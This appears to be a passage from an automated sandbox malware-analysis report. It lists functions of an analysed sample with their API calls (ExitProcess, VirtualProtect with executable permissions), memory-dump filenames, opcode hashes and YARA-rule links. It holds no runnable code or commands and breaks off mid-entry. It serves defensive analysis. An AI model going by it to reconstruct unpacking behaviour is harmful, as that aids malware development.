                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: :H?K
                                                                                                      • API String ID: 0-2039196037
                                                                                                      • Opcode ID: 68302125b90fc6b4b589e316e2ad6c09cf457cbf499ead4b2bc479f71a071fb4
                                                                                                      • Instruction ID: 8bc4f34ac26ed23f6b6a8e4bba3f564659bc5eafabc05b0f8ba65095505082ec
                                                                                                      • Opcode Fuzzy Hash: 68302125b90fc6b4b589e316e2ad6c09cf457cbf499ead4b2bc479f71a071fb4
                                                                                                      • Instruction Fuzzy Hash: CD51F3F1D096699BE7248A14CC54AEA7774EB41310F1041FFD90E662C1DA386FC2CF96
                                                                                                      Function 0041F0A1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 99COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(00000000,?,0041E876,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0041F488
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID: S
                                                                                                      • API String ID: 621844428-1211208622
                                                                                                      • Opcode ID: e2dc6364177f4dcd655a34e5974c3b599f5cb74249a1fc794ce27eb96ae0772a
                                                                                                      • Instruction ID: b28da51a00031b5079f211e58493cae194d72004ca33f74062e4e09d919eb0f7
                                                                                                      • Opcode Fuzzy Hash: e2dc6364177f4dcd655a34e5974c3b599f5cb74249a1fc794ce27eb96ae0772a
                                                                                                      • Instruction Fuzzy Hash: 6731E2F1D052189BF724CA25CC51BEA77B5EF94300F1440FAD60E5A281E6389EC38E16
                                                                                                      Function 0041F0A6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(00000000,?,0041E876,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0041F488
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID: S
                                                                                                      • API String ID: 621844428-1211208622
                                                                                                      • Opcode ID: 11bec9611e95aa1c8cc69923a34508f0b7b30821f368b76cd3277ecbc4dfd76b
                                                                                                      • Instruction ID: cec4efb327074f48e0801cd978a708a2520e2ce4732b73d292359f47deade18a
                                                                                                      • Opcode Fuzzy Hash: 11bec9611e95aa1c8cc69923a34508f0b7b30821f368b76cd3277ecbc4dfd76b
                                                                                                      • Instruction Fuzzy Hash: 9E215CF1D011189FE764CA14DD94BEAB7B9FB94300F1040EAD60D9A281D779AEC68E24
                                                                                                      Function 0041F0AB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(00000000,?,0041E876,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0041F488
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID: S
                                                                                                      • API String ID: 621844428-1211208622
                                                                                                      • Opcode ID: 990ee74f2e53481b50c777808fad6a5612b92fb8e98dd5e0d807f0f128bc30c7
                                                                                                      • Instruction ID: 5924a552ce417b6621629eaaba8c89dae8011fff8510cc033bb22ca3da2c1064
                                                                                                      • Opcode Fuzzy Hash: 990ee74f2e53481b50c777808fad6a5612b92fb8e98dd5e0d807f0f128bc30c7
                                                                                                      • Instruction Fuzzy Hash: 12216DF1D011189FF764CA14DD94BEAB7B9FB94300F1040EAD60DA6391D7789EC28E24
                                                                                                      Function 0041F053 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(00000000,?,0041E876,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0041F488
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID: >@@>
                                                                                                      • API String ID: 621844428-1882361824
                                                                                                      • Opcode ID: e0c1974253828cfad89c1f2893922493ecf46fa348959add429265f5b0c3929b
                                                                                                      • Instruction ID: cd211c93531d1da44e0b69105c842fb9373aa4a9506d35e9ea09928709d29fe5
                                                                                                      • Opcode Fuzzy Hash: e0c1974253828cfad89c1f2893922493ecf46fa348959add429265f5b0c3929b
                                                                                                      • Instruction Fuzzy Hash: 1011C1F2D01114AFF724CA25DD54BEB7679EB84300F0080FAE50E9A280D6789FC28E21
                                                                                                      Function 00407801 Relevance: 1.7, APIs: 1, Instructions: 158memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(00000000,?,00000040,00000000,00000000,?,?,0040736D,00000001,?,0040736D,?,?,0040736D,00000000,00407357), ref: 00407A89
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: 7550c04c7d1c6ed5813d738489f05ced33f7691402272bb80c156ad84dccc5cc
                                                                                                      • Instruction ID: 845ed5adf82bb4617e0731d24db6cd57fd088ba778bb837ddb6821d3747abcb3
                                                                                                      • Opcode Fuzzy Hash: 7550c04c7d1c6ed5813d738489f05ced33f7691402272bb80c156ad84dccc5cc
                                                                                                      • Instruction Fuzzy Hash: 13615DB1E091689BEB24CB14CC90BEEB7B5EB85311F1480EAD84D63281D6396FC1CF56
                                                                                                      Function 00406F36 Relevance: 1.6, APIs: 1, Instructions: 139memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(00000000,?,00000040,00000000,00000000,?,?,0040736D,00000001,?,0040736D,?,?,0040736D,00000000,00407357), ref: 00407A89
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: 4a81cd8c706ec6aafe012f9ae63e8460f146e9a8bb44c7ca8374e6a6aa58f764
                                                                                                      • Instruction ID: 1dc414e7759564d922c2ae6690b6e84fe5934d2978c904163384cb724b820794
                                                                                                      • Opcode Fuzzy Hash: 4a81cd8c706ec6aafe012f9ae63e8460f146e9a8bb44c7ca8374e6a6aa58f764
                                                                                                      • Instruction Fuzzy Hash: 5B51B7B2D052659FEB248A14DC94BEB7778EB44310F1440FAD80DA6281D63C6FC1CF56
                                                                                                      Function 00407643 Relevance: 1.6, APIs: 1, Instructions: 132memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(00000000,?,00000040,00000000,00000000,?,?,0040736D,00000001,?,0040736D,?,?,0040736D,00000000,00407357), ref: 00407A89
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: f81516231bd1dffb399a12a2493d534211e434a62d7813a6d67bc251793be548
                                                                                                      • Instruction ID: 52c794ab1343a8a3f290d5725d995de5d13fd2c0878a69c667a1c148dcbf7c68
                                                                                                      • Opcode Fuzzy Hash: f81516231bd1dffb399a12a2493d534211e434a62d7813a6d67bc251793be548
                                                                                                      • Instruction Fuzzy Hash: 9D41AEF1D185289BE7248A14DC95AEAB778FB44310F1041FAE90E67280D7386FC2CE96
                                                                                                      Function 004073AE Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: 83eb4b2a45bb2542a820ce59a058728bcf5c27faecf336c3d26f37931cf138fc
                                                                                                      • Instruction ID: 09e82f53a056d2f29952fad62caaf39b6a1bc11f4ef3838108c6ec59d7c00076
                                                                                                      • Opcode Fuzzy Hash: 83eb4b2a45bb2542a820ce59a058728bcf5c27faecf336c3d26f37931cf138fc
                                                                                                      • Instruction Fuzzy Hash: 3141E2F1D191299BE7248A14DC54BEA7778EB40310F1000FED90E662C0D63C6FC28E57
                                                                                                      Function 004075FB Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: e69cbd7f75919da00771d40e3c613223661446667e37d1a31347ea66630b99f3
                                                                                                      • Instruction ID: fe9ca12db6763e56780aa5cf9fa202e906c373e852430ebbc227e7532b462a67
                                                                                                      • Opcode Fuzzy Hash: e69cbd7f75919da00771d40e3c613223661446667e37d1a31347ea66630b99f3
